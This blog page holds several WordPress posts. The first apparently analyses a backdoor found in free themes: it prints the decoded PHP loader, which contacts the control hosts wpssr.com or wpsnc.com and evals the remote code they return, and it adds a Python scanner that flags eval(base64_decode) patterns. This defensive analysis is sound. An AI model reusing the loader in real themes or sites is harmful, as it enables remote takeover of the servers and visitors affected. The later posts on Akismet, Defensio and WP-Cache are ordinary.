WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper and saw this in his theme’s header.php (I added the newlines for display purposes; the base64 string is shown truncated):

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with added newlines and indentation; the comments are mine, describing what each part does):

// Pick whichever control host answers a TCP connect within 3 seconds.
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
else
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { // fetch PHP from the control host (reporting this page's URI and host) and execute it
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
    $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
    @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
} else { // no allow_url_fopen: fetch the remote content and echo it straight into the page instead
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
    @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}

A classic arbitrary code execution backdoor, behind a few layers of masking: it phones home to whichever control host answers, reports the requested URI and hostname, and then evals whatever PHP comes back (or, without allow_url_fopen, just echoes the remote content into the page).
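A small scanner for this pattern, added here as an example and not the author's code: it decodes every eval(base64_decode('...')) literal in a theme's PHP files and flags payloads that call the functions the backdoor relies on. The sample header and the example.invalid host are constructed stand-ins, not the real payload.

```python
import base64
import os
import re

# The obfuscation seen in the infected header.php: eval() around base64_decode()
# of a string literal, usually with @ suppression; the blob may be wrapped across lines.
EVAL_B64 = re.compile(
    r"@?eval\s*\(\s*@?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)

# Calls that, inside a decoded payload, point to a remote-code loader.
SUSPICIOUS = ("fsockopen", "file_get_contents", "readfile", "eval", "curl_exec")


def find_eval_payloads(php_source: str) -> list:
    """Return one finding per eval(base64_decode('...')) in php_source."""
    findings = []
    for m in EVAL_B64.finditer(php_source):
        blob = re.sub(r"\s", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "suspicious_calls": [f for f in SUSPICIOUS if f in decoded.lower()],
        })
    return findings


def scan_theme_dir(root: str) -> dict:
    """Map each .php file under root to its findings; files with none are skipped."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_eval_payloads(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed sample mimicking the infected header.php; the payload is a
# harmless stand-in that only names the same functions as the real one.
PAYLOAD = 'if(@fsockopen("example.invalid", 80)) { @eval(@file_get_contents("http://example.invalid/w1.php")); }'
SAMPLE_HEADER = "<body><?php @eval(@base64_decode('%s')); ?>" % base64.b64encode(PAYLOAD.encode()).decode()
```

Run scan_theme_dir() against wp-content/themes to get a per-file report; any hit whose suspicious_calls is non-empty deserves a manual look at the decoded text.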

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php


Which doesn’t turn out to be as bad, only a few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposely omitted; they don’t need any more PageRank. Who knew people were so shady. I urge those looking for WordPress themes to stay away from sites such as these.

Edit: I found a post on GigaOM that reports this same issue and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.


Beta Testing Defensio

Akismet isn’t perfect. I’ve been using it to block my spam since it became available. One of its major problems is that it often lets through what Defensio calls URL-less spam, and sometimes it lets through spam WITH URLs, which I don’t quite understand.

Anyway, right after this post I’ll be disabling Akismet and turning on the Defensio beta. I’ll be monitoring incoming spam, incoming ham, page load speed, etc. If you notice anything funky, let me know 🙂


Testing WP-Cache

This is only a test 🙂

If there are any problems, please let me know!


Akismet Annoyances

I use Akismet on my WordPress site to catch spam. At first I was very impressed with it. When I first installed it (a few weeks after it was announced), it worked very well; it would catch all spam and let all ham through. I’ve made sure to have the latest version of the Akismet plugin for WordPress installed. Since 99% of the spam determination is done on the Akismet server side, there haven’t been any client-side updates in some time. My Akismet setup has caught 25,521 spam comments so far.

But recently, it has been misbehaving on my site and on the sites of some of my friends who use it. I get 5-10 spam comments a week that Akismet thinks are ham, and every once in a while I’ll get a ham comment that Akismet thinks is spam. Then it will place SOME items in moderation which are VERY obviously spam (100+ links).

It’s annoying, and I wish Akismet would get it together. For now, I’ll be patient and keep flagging comments accordingly. After all, there’s still nothing better…

Edit: I found an announcement for Defensio, which could be an Akismet replacement. I requested information and perhaps inclusion in the beta. This sounds promising.


WordPress performs poorly.

When I first came into web development and blogging, I thought WordPress was great. It handled many of the things that I needed handled, and it did so intuitively and fairly quickly. Since then I’ve had lots of experience with poor performance, and with optimizing web code for performance. Let’s face it, we don’t all have dedicated quad cores for web hosting, nor do we necessarily have separate boxes for the DB server and the web server.

WordPress is not optimized for large amounts of traffic. There is seemingly no caching (within WordPress) whatsoever. On a normal page load it makes no fewer than 10 trips to the database. That’s why if you see an unprotected WordPress site get “dugg” or “slashdotted”, it will go down after only a moderate number of concurrent hits.

WP-Cache is a plugin for WordPress that caches pages and posts, so WordPress doesn’t have to hit the database on every page load. I couldn’t get it to work with my WordPress setup after about half an hour of tinkering, but in theory it would make WordPress a robust piece of software rather than a performance hog. But the point is that there should be no excuse for writing poorly performing code. There shouldn’t have to be a user-submitted tweak that “fixes” software so it isn’t slow.

Maybe we’ll see it when the WordPress team finally considers it high priority, perhaps by WordPress version 5.9.2.
